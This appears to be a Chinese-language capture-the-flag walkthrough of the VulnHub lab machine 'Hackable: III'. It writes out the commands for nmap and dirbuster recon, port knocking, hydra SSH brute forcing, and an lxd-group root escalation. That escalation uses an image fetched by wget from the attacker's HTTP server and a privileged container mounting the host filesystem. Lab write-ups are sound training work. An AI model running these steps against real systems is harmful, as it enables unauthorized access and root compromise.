vulnhub-HACKABLE: Hackable: III
Hackable: III
攻击机:kali linux
Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux
靶机:Hackable: III
信息收集:
NMAP探测端口信息:nmap 192.168.1.1/24
nmap探测详细端口信息:nmap -sS -sV -A -p- 192.168.1.103
探测到了robots.txt。
访问80端口。
没啥东西,在访问robots.txt
提示我们/config。访问一下。
一个文件目录。 访问一下1.txt。
貌似是一段base64.解出来是10000.
没啥收获了,跑一下目录:dirbuster -u http://192.168.1.111
挨个访问一下:
http://192.168.1.103/backup/
发现了一个密码本,
打开全是密码,盲猜是登陆用户的。其他目录没啥有价值的。
再翻看一下网页源码。再初始界面看到这样两个后缀,
并且发现了注释有点猫腻,
<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->
这里看到:jubiscleudo、dev_suport@hackable3.com。这样两个信息。
这段话的大概意思是让jubiscleudo,不要忘记激活端口碰撞,并且要让这个网站支持jpg文件。
这里引入端口碰撞。
再回头去看扫描出来的22端口,它是关着的。
继续访问:
http://192.168.1.103/login_page/
点击一下login.html
出现了一个登陆界面。
盲猜刚才的密码这里使用的。
http://192.168.1.103/login.html
http://192.168.1.111/login.php
发现了源代码。header('Location: 3.jpg');提到了一个3.jpg,但是扫描目录没发现。尝试直接访问试试。http://192.168.1.111/3.jpg
一张图片。
http://192.168.1.111/config.php源码里发现了数据库登陆信息。
信息收集完毕。开始进行测试。
打开登陆界面,拿我们收集到了用户名jubiscleudo和密码进行爆破测试,
这里用的bp,就不截图了,因为没结果,看来思路是错的,这个账号信息不是用来登陆这个界面的。
往下走。现在的路只有22端口的端口碰撞了。但是目前还不知道要碰撞哪几个端口。
看了大佬们的wp,重点再3.jpg的图片上,貌似用了图片隐写术。
这里我也开始破解隐写术:
这里用到隐写术工具,steghide。
安装: apt install steghide
这就可以开始破解图片了:steghide extract -sf 3.jpg
这里拿到一个65535
之前拿到了一个10000
貌似还缺一个。看大佬的wp,2.txt那个页面还有一个。
解码一下,这里推荐用这个网站:CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码
解出来4444。三个端口够了,开始撞开22端口。
这里使用的是:knock
大家可apt install knock下载
knock 192.168.1.104 10000 4444 65535
成功打开22端口。
然后利用hydra对之前收集到的jubiscleudo和backup界面的密码本进行爆破。
hydra -l jubiscleudo -P password.txt 192.168.1.104 ssh注意大小写
连接的时候会报错,
这里只需要输入提示的这句命令就OK了。
成功登录后开始信息收集。
home目录下发现了一个用户。
看一下网站根目录。
最后再隐藏文件.backup_config.php下发现了hackable_3的账户密码信息。
成功登陆。
查看账户信息。
法宣博客116(lxd)
看到关于lxd组提权的文章。这里进行尝试。
下载文件
GitHub - saghul/lxd-alpine-builder: Build Alpine Linux images for LXD
解压成功,打卡文件。
运行文件里的build-alpine
我这里生成了两个压缩文件。。。。这里就拿红色名称的来测试吧。
python快捷生成文件下载服务。
python -m SimpleHTTPServer 8888
去到目标主机上下载该文件。
wget 192.168.1.114:8888/alpine-v3.15-x86_64-20220429_0227.tar.gz
然后
lxc image import ./alpine-v3.15-x86_64-20220429_0227.tar.gz --alias myimage
ls 可以看到生成了snap这样一个文件,进去后发现里面有lxd的这个文件。
再执行lxc image list
这里记得这个FINGERPRINT的值。
然后进到lxd的目录下执行
lxd init
一路回车下来,然后进行提权,
lxc init 8925373758dc ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
挂载完成,开始提权。
lxc start ignite
lxc exec ignite /bin/sh
拿到flag。
vulnhub-HACKABLE: Hackable: III相关推荐
- VulnHub靶机_HACKABLE: III
文章目录 靶机介绍 渗透过程 准备 获取IP 端口扫描 信息收集 信息1 信息2 信息3 信息4 信息5 信息6 信息7 端口碰撞 ssh登录 提权 靶机介绍 下载地址: http://www.vul ...
- Hackable Projects (可拓展的项目)
试着翻译一些英文Blog,这是小试鸡刀第一篇,是Google Testing Blog发布的关于Hackable Projects的.感觉翻译得有点怪,其中有些错误与不解,希望有同学指正. Hacka ...
- 【VulnHub靶场】Hackable: III
Step 1 在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集 Command used: << nmap -sV -p- 192.168.31.180 >> S ...
- Atom:A hackable text editor for the 21st Century
为什么选择 Atom 这个世界上有那么多种编辑器,为什么你要花时间学习和使用 Atom 呢? 虽然 Sublime 和 TextMate 之类的编辑器已经非常好用了,但它们仅提供了很有限的拓展性.而在 ...
- VulnHub靶场----Hackable_3
免责声明 文章为作者学习记录,请勿利用文章相关技术从事非法活动, 如因此产生任何的不良后果与文章作者无关,本文仅供学习参考. 靶机:Hackable: III ~ VulnHub 攻击机:VM ka ...
- 剑指offer:面试题32 - III. 从上到下打印二叉树 III
题目: 从上到下打印二叉树 III 请实现一个函数按照之字形顺序打印二叉树,即第一行按照从左到右的顺序打印,第二层按照从右到左的顺序打印,第三行再按照从左到右的顺序打印,其他行以此类推. 例如: 给定 ...
- 基于μC/OS—III的CC1120驱动程序设计
基于μC/OS-III的CC1120驱动程序设计 时间:2014-01-21 来源:电子设计工程 作者:张绍游,张贻雄,石江宏 关键字:CC1120 嵌入式操作系统 STM32F103ZE ...
- Visual Studio进行Web性能测试- Part III
原文作者:Ambily.raj 对于一个多用户的应用程序,性能是非常重要的.性能不仅是执行的速度,它包括负载和并发方面.Visual Studio是可以用于性能测试的工具之一.Visual Studi ...
- SAP QM Multiple Specifications的使用III
SAP QM Multiple Specifications的使用III Part III:建单据,展示功能 创建采购订单, 执行收货, 检验批被成功触发, QE01去录入结果, 刚进入界面,系统自动 ...
最新文章
- js function理解
- python引入redis_使用python向Redis批量导入数据
- 设置中文环境_我花几年时间找到的学习中文好方法,值得你一看
- HTML5新特征、窍门和技术(16~20)
- mysql 删除process_MySQL中Alter table 你不知道的性能问题
- David I 盛大之行及Delphi未来畅想
- ios布局 分为左右两块_安卓手机一年后卡顿,原因是安卓系统太开放了,改走iOS封闭之路...
- 计算机网络cr什么意思,网络用语cr是什么意思
- TCP/IP 和 Socket 的关系
- NAT,代理服务器技术
- Picasso 源码解读
- 学习Spring之前要先学习什么?
- java应聘面试自我介绍范文
- 关于地理数据收集与处理的基本工具推荐(3)--最新30m的DEM与DSM数据免费下载
- ROSLAUNCH 的.launch/XML 语法
- Android修行手册 - ConstraintLayout示例
- 3ds max不能完全自定义设置FOVX和FOVY(3ds max 2014)
- SAP PCA利润中心会计案例教程案例介绍
- JavaScript中splice的用法
- 对Restful的理解
热门文章
- 驾驶员模拟考试系统mysql_驾驶员理论考试模拟训练系统的设计与实现
- android 拍照无法生成图片,Android生成二維碼--拍照或從相冊選取圖片
- java flv 转swf_java实现视频文件转换为flv(带文件缩略图)
- java md5 decode_Java MD5加密类
- 三维场景中常用的路径动画
- 第三届中国CEO新年峰会参会感想一
- 酸奶行业内卷成风,品牌乱象层出不穷
- 这70道算法题你都会的话,可以直接去字节跳动了!
- 看完令你大彻大悟的22道经典Redis面试题,附带答案(下)
- 黑苹果进不了系统自动重启_苹果手机频繁自动重启